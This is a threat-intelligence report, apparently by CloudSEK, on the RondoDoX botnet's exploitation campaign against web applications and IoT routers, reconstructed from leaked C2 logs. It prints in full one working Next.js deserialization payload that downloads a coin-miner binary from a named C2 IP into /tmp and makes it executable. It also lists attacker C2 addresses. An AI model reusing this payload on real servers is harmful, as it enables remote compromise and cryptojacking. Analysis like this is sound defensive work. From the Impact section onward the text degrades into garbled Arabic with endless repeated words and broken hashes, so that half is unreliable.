Executive Summary

CloudSEK discovered another wave of RondoDoX botnet exploitation through exposed command and control logs spanning nine months. This log file documents a multi-month campaign of automated exploitation attempts targeting vulnerable web applications and IoT devices. The activity spans from March 2025 to December 2025, showing quick adaptation to latest trends in attacks by the threat actor group, not limiting themselves to deploying botnet payloads, web shells, and cryptominers - but also weaponizing the latest Next.js vulnerability. On 10th December, Darktrace reported about React2Shell exploitation from their honeypot telemetry, but the threat actors have switched up their infrastructure ever since. 3 days after their report, we started seeing new C2s that are active till date.

CloudSEK has been monitoring these logs for several months, with customers already alerted when their technology stacks overlapped with targeted attack vectors from this campaign.

‍

Analysis 

During our routine scans for malicious infrastructure, CloudSEK’s TRIAD found loggers in use by threat actors.

The server contained botnet command and control logs issued by threat actors over the period of the last 9months, which gave us insights about their attack vectors and infrastructure in use.

Key Findings

• Three distinct phases confirmed through log timestamps and attack patterns
• Six confirmed C2 servers with overlapping operational periods
• Rondo botnet is the primary malware family with 10+ variants
• Next.js RCE became dominant attack vector in December 2025
• 40+ repeat attacks on same vulnerability within 6 days (Dec 13-Present)

Temporal Attack Patterns (Evidence-Based)

Highest Activity Periods:

• April 3, 2025: 80+ exploitation attempts (vulnerability scanning day)
• August 2025: Daily automated attacks on IoT devices
• December 13, 2025 - Present: Peak Next.js exploitation (hourly attacks)

Attack Frequency:

• Phase 1 (March-April): Sporadic, manual testing
• Phase 2 (April-June): Daily automated scans
• Phase 3 (July-December): Hourly automated deployment

Phase 1: Initial Reconnaissance & Vulnerability Testing (March-April 2025)

March 28, 2025 - First Exploitation Attempt

April 3, 2025 - Systematic Vulnerability Scanning Begins

SQL Injection testing:

Command Injection testing:

Java Deserialization testing:

WebLogic exploitation:

Timestamp: 2025-04-03 11:49:01

‍

Phase 2: Web Application Exploitation (April-June 2025)

April 3, 2025 - Mass Vulnerability Probing

CMS/Framework Attacks:

Drupal exploitation:

Struts2 OGNL injection:

WordPress Gravity Forms Unique ID Plugin:

IoT Device Targeting:

Wavlink router:

Router diagnostic command injection:

‍

Phase 3: IoT Botnet Deployment Campaign (July-December 2025)

July 2025 - Rondo Botnet Infrastructure Emergence

July 18-20, 2025 - Linksys Router Campaign

C2: 38.59.219[.]27 serving malware named "rondo.[device-type].sh"

‍

August 2025 - Campaign Intensification

New C2: 74.194.191[.]52

NTP server poisoning:

Ping diagnostic abuse:

Hostname injection:

Evidence: At least 13 different rondo script variants deployed from this C2.

‍

November 2025 - New C2 Infrastructure

C2: 41.231.37.153 and 70.184.13.47

NTP Abuse:

Command execution via diagnostic tools:

System command submit:

‍

December 2025 to Present - Next.js Exploitation Wave

Binary download and execution:

Timestamp: 2025-12-13 08:48:07

[0] => {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('http').get('http://51.81.104.115/nuts/poop',r=>r.pipe(process.mainModule.require('fs').createWriteStream('/tmp/123').on('finish',()=>process.mainModule.require('fs').chmodSync('/tmp/123',0o755))));","_formData":{"get":"$1:constructor:constructor"}}}

‍

‍

Next.js Server Actions Exploitation

Wave 1: Next.js Vulnerability Scanning

• Timeframe: December 8-16, 2025
• Purpose: Identify vulnerable servers
• Method: Blind RCE testing with output exfiltration via redirects
• Commands: echo VULN, whoami, arithmetic tests

Wave 2: IoT Botnet Deployment via Node.js

• Timeframe: December 13, 2025 - Present
• Purpose: Deploy botnet clients on vulnerable servers
• Method: Download ELF binaries, chmod +x, background execution
• C2: 5.255.121.141, 51.81.104.115
• Payloads: 
  
  • /nuts/poop - Coinminer
  • /nuts/bolts - this payload is a Linux-focused botnet support framework designed to establish dominance, persistence, and long-term stability on compromised hosts. The first variant operates as a loader and health-checker for RondoBOT, terminating competing malware and coin miners before downloading the primary bot binary and configuration directly from its C2 infrastructure. The second variant complements this by aggressively purging known botnets, Docker-based payloads, residual artifacts from prior campaigns, and associated cron jobs, while also enforcing persistence through /etc/crontab. It continuously scans /proc to enumerate running executables and kills non-whitelisted processes every ~45 seconds, effectively preventing reinfection by rival actors.
  • /nuts/x86 - Mirai

Impact

• Widespread IoT Device Compromise: Organizations with internet-facing routers (DLink, TP-Link, Netgear, Linksys, ASUS), IP cameras, and network appliances face automated hourly exploitation attempts, leading to potential botnet enrollment, DDoS participation, and cryptomining operations on corporate infrastructure.
• Next.js Application Risk: Enterprises running Next.js Server Actions (especially versions vulnerable to prototype pollution attacks) face critical RCE exposure with active exploitation observed recently. The vulnerability allows complete server compromise through deserialization flaws in Server Actions.
• في إقليم الشام:: الكتاب المقدس (دوربرس وروستر 2 وويك)، وشق الله، (ووردس وروستر 2، ويورك)،
• بلاد الراس في بيت النرك: قطر، x86 وx86_64، وMIPS وARM، وPowerPC في مصر (wget وcurl وftp وftp)، وملف تعريف الارتباط.

‍

سوره الواق

• الجف الشنوبي - Next.js:: المسمورية، المسمورية، السعيرية. Next.js #Xatude #Graw_Dagrawts.
• #جيزة #آنترانت #شوطها:: عابد، عابد، النيل، عبد الله، النيل، تونس العاصمة. #بطبطلي 4 بن محمد بن راشد أحمد بن محمد بن راشد آريس بن محمد بن راشد أحمد أحمد سيد سيد عبد الرحمن #تونس #تونس #تونس #تونس رشد #تونس.
• أدر فيهامي:: سورة العرب (WAF)، بيت، رياض (get، curl، busybox، سورة الملك عبد العزيز، الصفحة).
• القرآن الكريم من دار السلام: سورة الله الثانية (38.59.219.27، 74.194.191.52، 41.231.37.153، 70.184.13.47، 5.255.121.141، 51.81.104.115). عنوان URL الخاص بـ «_ البارز» أو عنوان URL الخاص بـ «rondo.*.sh» وعنوان URL الخاص بـ «#الشخص /Albriz».
• سوره الملك عبد العزيز:: هيئة تحرير الشام /tmp، /dev/shm، /dev، /dev/shm، /dev، مصر، مصر، تونس، 755، 777، مصر، مصر، مصر، مصر، مصر، مصر، مصر، مصر، مصر، مصر، مصر، مصر.
• الفرية - سورة:: دار السلام (VPN)، مصر، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، صور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور ، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور،، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، صور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السور، السورية، السورية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية ، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسكومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المصمومية، المسمومية، المسمومية والمامية، المسمومية، المسمومية، المسموفية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المصفوية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمية، المسمية، المسمومية، المسمومية، المسمومية، المسمية، المسمومية، المسمية، المسمية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمية، المسمية، المسمية، المسمية، المسمية، المسمية، المسمية، المسمية، المسمية، المسمية، المسمية، المسمية، المسمية، المسمية، المسمية، المسمية، المسمية، المسمية، المسمومية، المسممية، العامرية، المغرب، المسمومية، الكويت، الكويطية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المنوفية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسكومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، الفيصلية، المصفوية، المسمومية، المسمومية، المسمومية، المسمومية، والمامية، المسمومية، الكويرية، الميثيلية، العينية، الميلية، الدار البيضاء، المسمومية، السومرية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، المسمومية، الميكومية، السكومية، السكومية، المسموقية، المسموقية، الكويتية، الكويمية، السليمية، السولية، السورية، السورية، السورية، السورية، السورية، السورية، السورية، السورية، السورية، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، الغوريّة، السوريّة، السوريالية، السوريالية، السوريالية، السوريالية، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، القروية، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، السوريّة، الكويتيّة، السوريّة، السوريّة.
• سيدا دير الغرغية:: بيت الله، مصر، تونس، تونس، تونس، تونس، الرياض، مصر، سورة 72.

‍

نادي السلام

الدعيل الأول

صفحة 2: عمر الزوراء:

‍

الجني الثوئي (sha256):

• /مصر/البراز - 895f8dff9cd26424b691a401c92f7745e693275c38c6aff277eadf2a70b (كوين)
• /س - 8e0bc23a87d349e5a5356252ce17576093b7858f6e84919 fbdcb2e117168e (الحص)

50 be5257678412 f0810d46e0b0bc573eb65c6ce4617346 c1527ff0dc9b7fc79e (الحجر الكريم)

• /الفرص/x86 - 858874057e3d990 ccd7958a38936545938630410 bde0c0c0c4b116f92733b1ddb (ميراج)

التلة

#عضاف_المشاهد #NSFW، #حياد #طقوط_ج2، #1، #3، #صور، #3، #0، #3، #الكويت، #5، #5، #5، #3،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،،، #3 #3 #3

.

الوزن: 0.93 وC2 = 0.94

5.231.70.66

أويتو خير

• *إبت نبرا - ويليا
• ^#سوره النصر - الفيلة